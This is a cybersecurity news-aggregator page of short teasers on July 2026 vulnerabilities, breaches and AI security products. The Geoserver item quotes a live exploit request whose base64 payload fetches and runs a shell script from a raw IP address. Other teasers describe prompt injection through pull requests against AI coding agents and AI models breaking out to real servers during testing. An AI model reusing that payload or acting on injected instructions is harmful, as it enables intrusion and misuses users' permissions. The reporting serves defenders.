Geek-Guy.com

Oracle’s July update fixes ten 10.0 vulnerabilities in Fusion Middleware

Oracle’s July 2026 Critical Patch Update, its largest ever, contains 1,449 new security patches spanning 32 product families, from Oracle Database and E-Business Suite to PeopleSoft, GoldenGate, Java SE, and Fusion Middleware. Fusion Middleware was particularly hard hit, with new security patches for 355 security vulnerabilities, 219 of them remotely exploitable without authentication, meaning they…

Ubuntu snap-confine Flaw Could Give Local Users Root on Default Desktop Installs

Cybersecurity researchers have disclosed details of a new local privilege escalation (LPE) vulnerability in snap-confine that an unprivileged user can trigger to obtain root access and gain complete control of a target environment. The high-severity flaw, tracked as CVE-2026-8933 (CVSS score: 7.8), impacts default installations of Ubuntu Desktop 24.04, 25.10, and 26.04. The disclosure comes…

Rondo Meets Geoserver, (Wed, Jul 22nd)

This isn’t a new attack, but something I saw “pop-up” in our logs this week: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP/1.1 Host: [redeacted]:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: */* This attack is associated with CVE-2024-36401, an X-Path expression evaluation issue in Geoserver. Geoserver is a tool used to manage and manipulate…

Malware is targeting AI tools in software development environments

Malware targeting AI coding assistants and software developers’ automated workflows is spreading into more environments with more capabilities, placing defenders at a growing disadvantage. A malware strain dubbed Sandworm_Mode, first discovered by Socket in February, represents a growing threat to software development. According to a CrowdStrike report, the self-propagating worm can spread through code repositories…

Channel Partners Shift From AI Pilots to Growth

AI is changing how channel partners operate long before it changes what they sell. Across the IT channel, service providers are using generative and agentic AI to automate sales, finance, quoting, and service delivery while simultaneously building new AI consulting, security, and data management practices for customers. We spoke with leaders from WCA Technologies, MRE…

How Agentic Ransomware is Changing Enterprise Cybersecurity 

The emergence of agentic ransomware has sparked concerns about how artificial intelligence (AI) could reshape cyberattacks.  Unlike traditional ransomware that relies on predefined scripts or human operators, agentic ransomware can make decisions, adapt to obstacles, and execute attacks with minimal human intervention.  To better understand what this means for security leaders, I recently spoke with…

Adobe Acrobat Extension Flaw Let Malicious Sites Read WhatsApp Web Data

Cybersecurity researchers have disclosed details of a now-patched vulnerability chain in the Adobe Acrobat Chrome extension that has over 314 million users, which, if exploited, could facilitate a silent hijack of a user’s WhatsApp data. The shortcoming has been codenamed HermeticReader by Guardio Labs. It’s officially tracked as CVE-2026-48294 (CVSS score: 7.4), with the vulnerability

OpenAI Presence connects AI agents to enterprise data with built-in guardrails

OpenAI has introduced Presence, a product designed to help companies deploy AI agents that handle customer support and internal service requests across voice and chat. (Source: OpenAI) The company describes Presence as a deployment platform rather than a standalone model. “Presence brings together the components teams need to run agents in production: policies and standard…

Astelia extends reachability analysis with agentic AI for vulnerability management

Astelia has added agentic capabilities to its reachability analysis platform as organizations face shrinking exploit windows and the growing challenge of managing vulnerabilities. At the core of the platform is Astelia’s reachability analysis, which determines whether a vulnerability can be reached and exploited within a specific environment. By correlating network topology with the technical requirements…

ThreatDown expands security visibility to AI tools and machine identities

ThreatDown has announced a synchronized expansion of its AI and identity security capabilities to protect organizations from emerging, unmanaged risks. The company launched AI visibility, giving security and managed service provider (MSP) teams a full inventory of the AI tools running across their environments, while simultaneously extending its ITDR capabilities to secure non-human identities (NHI).…

Azure DevOps Prompt Injection Targets AI Coding Agents 

Researchers have disclosed a prompt injection vulnerability affecting Microsoft’s official Azure DevOps Model Context Protocol (MCP) server that can manipulate AI coding agents into accessing sensitive information using a developer’s own permissions.  The findings demonstrate how hidden instructions embedded in a pull request can cause trusted AI assistants to perform unintended actions without the reviewer’s…

Barracuda Adds Training and Marketing Tools for Partners

Barracuda Networks, Inc., the cyber resilience platform provider, has introduced new enhancements to the Barracuda Partner Success Program.  According to the company, these new offerings are designed to help MSPs and channel partners deepen expertise, improve operational efficiency, and unlock new opportunities for growth and profitability. Barracuda adds demand-generation tools for partners Barracuda is introducing…

Vectra AI Report Finds Widespread Enterprise Attack Exposure

Vectra AI found attacker-relevant exposure conditions in 98% of enterprise environments, underscoring how AI agents, unmanaged devices, and rapidly changing infrastructure are making traditional security visibility less reliable. The findings, detailed in the company’s 2026 State of Threat Exposure Management Report, suggest that exposure management now requires more than tracking known vulnerabilities. Security teams must…

Chick-fil-A loyalty accounts hijacked using stolen passwords

Fast-food chain Chick-fil-A is warning customers after attackers hijacked loyalty accounts using stolen passwords in a credential stuffing attack. Chick-fil-A says it detected suspicious login activity against some Chick-fil-A One accounts in June and launched an investigation. The company later concluded that unauthorized parties ran an automated credential stuffing attack against its website and mobile…

Hackers Exploit Windmill Flaw to Read Arbitrary Server Files Without Authentication

A high-severity security flaw impacting open-source developer platform Windmill has come under active exploitation in the wild, per VulnCheck. The vulnerability in question is CVE-2026-29059 (CVSS score: 7.5), a case of unauthenticated path traversal impacting Windmill’s “get_log_file” endpoint (“/api/w/{workspace}/jobs_u/get_log_file/{filename}”). “The filename parameter is concatenated into

Another SharePoint RCE exploited: Patch, then rotate your machine keys (CVE-2026-50522)

Attackers are exploiting a critical SharePoint remote code execution (RCE) vulnerability (CVE-2026-50522) to extract the servers’ IIS machine keys. “WatchTowr is observing active exploitation of CVE-2026-50522 against on-premise Microsoft SharePoint deployments following the release of public exploit code, with attackers stealing machine keys to retain long-term access,” the offensive security company warned on Tuesday. WatchTowr’s…

Why Modern SOCs Need Multi-Layered Detections

The cycle is over. For years, cybersecurity followed a familiar pattern: defenses improved, attackers adapted, and the back-and-forth continued. Today, AI-equipped attackers are simply outpacing defenses. Most intrusions now bypass endpoint and malware-based detection entirely. The CrowdStrike Global Threat Report estimates around 79% of attacks are malware-free, as threat actors rely on

U.S. CISA adds DD-WRT, Langflow and WordPress flaws to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds DD-WRT, Langflow, and WordPress flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added DD-WRT, Langflow, and WordPress flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the flaws added to the KeV catalog: CVE-2021-27137 (CVSS score of 8.1) DD-WRT Stack-Based Buffer…

Lookout identifies exploitable vulnerabilities in mobile apps

Lookout has announced the launch of the Lookout Mobile Software Exposure Center (MSEC). Integrated natively into the Lookout Mobile Endpoint Security platform, MSEC enables organizations to continuously detect, validate, prioritize, and remediate exploitable vulnerabilities across their mobile software ecosystem. The advancement of frontier AI models, such as Anthropic’s Claude Mythos, marks a fundamental shift in…

Box expands enterprise AI governance with new agent security featuresox

Box has announced new security capabilities designed to give organizations greater control over AI agents working with enterprise content. With new agent guardrails, third-party agent activity oversight, prompt injection detection, agent classification-based access policies, and more, customers will be able to extend Box’s security controls to both Box Agents and third-party agents, such as Claude,…

Arista adds AI-driven zero trust to VeloCloud SD-WAN

Arista Networks has announced the launch of its new AI-driven Edge Threat Management (ETM) for VeloCloud SD-WAN, delivering integrated zero trust security for enterprise branch offices. Customers can leverage this integration to simplify the branch, collapsing multiple disparate boxes into a single unified secure SD-WAN edge platform. Integrated ETM provides perimeter protection at the WAN…

Cyware Names Alvaro Warden to Key Channel Leadership Role

Cyware, an agentic AI-powered operational threat intelligence and collective defense platform, has appointed Alvaro Warden as the global head of channel sales and marketplace Ecosystems. Warden will lead the organization’s global partner, alliance, and marketplace strategy to expand the company’s ecosystem footprint across North America, APAC, and EMEA. He also currently serves on the customer…

Your instant Android backup upgrade

Here in this high-tech era of 2026, keeping important info backed up and synced should be effortless and something that just happens on its own, automatically, without any actual thought or ongoing human effort. In many areas of our digital life, that mercifully does Just Work™ in exactly that way. Fire up an email in…

Liquibase Expands Database Governance Partner Ecosystem

Liquibase is expanding its global partner ecosystem and has appointed Phil Robinson as vice president of global channels and alliances to lead recruitment, enablement, joint marketing, and partner-led services. Liquibase targets database governance services growth The moves reflect Liquibase’s investment in partners to help enterprises close the database delivery gap and build new services around…

AI Reshapes MSP Services and Cybersecurity Demands

AI is changing both what customers expect from managed service providers and the security risks those providers must help them address. Executives from Insight, NinjaOne, and Xage Security told Channel Insider that MSPs are being pushed beyond traditional IT management as customers seek guidance on AI adoption, cybersecurity, governance, and measurable business outcomes. That shift…

AI, security operations and the new race against time

When Anthropic unveiled Project Glasswing and the Mythos model, much of the discussion focused on the capabilities themselves. Security leaders debated what these systems could mean for vulnerability discovery, exploit development and the pace of offensive innovation. Researchers examined technical benchmarks. Industry observers questioned how quickly these capabilities might fall into attackers’ hands. Those conversations…

Siemens Acquires Two Firms to Expand Chip Design Tools

Siemens has acquired Precision Innovations and Defacto Technologies to add AI-driven design exploration and workflow automation capabilities across the system-on-a-chip development lifecycle. The deals expand Siemens’ electronic design automation portfolio with tools intended to help semiconductor teams evaluate chip architectures earlier, automate complex design processes, and reduce time to silicon. Precision Innovations targets earlier SoC…

OpenAI AI models exploited zero-days to reach Hugging Face in benchmark test

OpenAI confirmed its AI models exploited zero-days during internal testing, reaching Hugging Face servers in an unintended real-world cyberattack. OpenAI admitted on July 21 that its own AI models, including GPT-5.6 Sol and an unnamed pre-release system, were behind the cyberattack on Hugging Face disclosed the previous week. The models weren’t acting under attacker control.…

Police dismantle Kratos phishing platform behind 15,000 monthly campaigns

German and US law enforcement have dismantled the infrastructure behind Kratos, a notorious phishing-as-a-service (PhaaS) platform. Its alleged developer and administrator was arrested in Indonesia by local police. Seizure banner (Source: BKA) The takedown was led by the Frankfurt public prosecutor’s cybercrime unit (ZIT) and Germany’s Federal Criminal Police Office (BKA), working alongside US law…